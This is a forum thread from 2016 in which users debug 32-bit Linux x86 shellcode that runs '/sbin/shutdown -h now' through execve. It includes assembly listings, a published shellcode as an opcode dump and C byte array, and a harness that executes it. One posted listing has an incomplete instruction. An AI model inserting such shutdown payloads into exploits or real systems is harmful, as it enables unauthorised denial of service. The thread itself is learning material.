shutdown shellcode doesn't shutdown linux machine

[pcfx]

Hi,

i wrote a simple shellcode which executes /sbin/shutdown via sys_execve. When I execute it in my Ubuntu VM it doesn't shutdown completely but remains in the 'shutdown state' (see attachement).

My shellcode length is 51 bytes. I also tried a shellcode example from shell-storm.org which is 56 bytes, but the result was the same.

Also I think the following 3 lines (5 bytes) in shell-storm shellcode are not necessary but I might be wrong..

8048062:    31 d2                   xor    edx,edx

8048069:    89 e7                   mov    edi,esp

804808f:    56                      push   esi

EDIT: Hm well i guess it's necessary to xor edx register because I found this in the man pages:

Quote

Both argv and envp must be terminated by a NULL pointer.

..and edx should point to the envp string array, correct? Even so it would work without XOR'ing edx register but this is because edx is already 0x00000000 (on incident?) I also saw very short shellcodes using sys_execve, where they didn't use edx register at all.

Is XOR'ing edx register equivalent to 'termintated by a NULL pointer' and to the following piece of assembly code:

xor eax, eax
push eax
mov edx, esp

This is my shellcode (51 bytes):

EDIT: I updated shellcode. It's now 53 bytes.

BITS 32
global _start

section .text
_start:

	xor eax, eax
	xor edx, edx			; EDITED!
	push eax			
	push word 0x682d			
	push eax			
	push 0x6e			
	mov word [esp+0x1], 
	mov edi, esp
	
	push eax			
	push 0x6e776f64			
	push 0x74756873
	push 0x2f2f2f6e
	push 0x6962732f
	mov ebx, esp

	push eax
	push edi
	push ebx
	mov ecx, esp

	mov al, 0xb
	int 0x80

When I type 'sudo shutdown -h now' the VM is shutting down completely. Can anybody explain why?

 

Edited July 19, 2016 by pcfx

[Extreme Coders]

The command to shutdown and poweroff is shutdown -h now.
However the shellcode is only passing shutdown now (without -h). You can verify this with strace.

The following shellcode should work

BITS 32
global _start

section .text     
 
_start:
    xor eax, eax
    xor edx, edx ; envp
 
    push eax
    push word 0x682d ;-h
    mov edi, esp
 
    push eax
    push byte 0x6e ; now
    mov [esp+1], word 0x776f
    mov esi, esp
 
    push eax
    push 0x6e776f64 ; /sbin/shutdown
    push 0x74756873
    push 0x2f2f2f6e
    push 0x6962732f
    mov ebx, esp
 
    push edx ; null envp
    push esi ; now null
    push edi ; -h null
    push ebx ; /sbin/shutdown null
    mov ecx, esp
    mov al, 11
    int 0x80

 

Edited July 19, 2016 by Extreme Coders

[pcfx]

Ok I see what I did wrong, thanks man it works now!

Anyway there is a typing mistake in the shell-storm shellcode. He uses edi register twice. Corrected Instruction in the comment.

 

/*
; Title: shutdown -h now Shellcode - 56 bytes
; Date: 2014-06-27
; Platform: linux/x86
; Author: Osanda Malith Jayathissa (@OsandaMalith)

Disassembly of section .text:

08048060 <_start>:
8048060:    31 c0                   xor    eax,eax
8048062:    31 d2                   xor    edx,edx
8048064:    50                      push   eax
8048065:    66 68 2d 68             pushw  0x682d
8048069:    89 e7                   mov    edi,esp
804806b:    50                      push   eax
804806c:    6a 6e                   push   0x6e
804806e:    66 c7 44 24 01 6f 77    mov    WORD PTR [esp+0x1],0x776f
8048075:    89 e7                   mov    edi,esp	; mov esi, esp
8048077:    50                      push   eax
8048078:    68 64 6f 77 6e          push   0x6e776f64
804807d:    68 73 68 75 74          push   0x74756873
8048082:    68 6e 2f 2f 2f          push   0x2f2f2f6e
8048087:    68 2f 73 62 69          push   0x6962732f
804808c:    89 e3                   mov    ebx,esp
804808e:    52                      push   edx
804808f:    56                      push   esi
8048090:    57                      push   edi
8048091:    53                      push   ebx
8048092:    89 e1                   mov    ecx,esp
8048094:    b0 0b                   mov    al,0xb
8048096:    cd 80                   int    0x80

*/

#include <stdio.h>
#include <string.h>

unsigned char code[] =  "\x31\xc0\x31\xd2\x50\x66\x68\x2d"
"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
"\x44\x24\x01\x6f\x77\x89\xe7\x50"
"\x68\x64\x6f\x77\x6e\x68\x73\x68"
"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
"\x2f\x73\x62\x69\x89\xe3\x52\x56"
"\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

int
main() {

printf("Shellcode Length:  %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();

return 0;
}

 

Edited July 19, 2016 by pcfx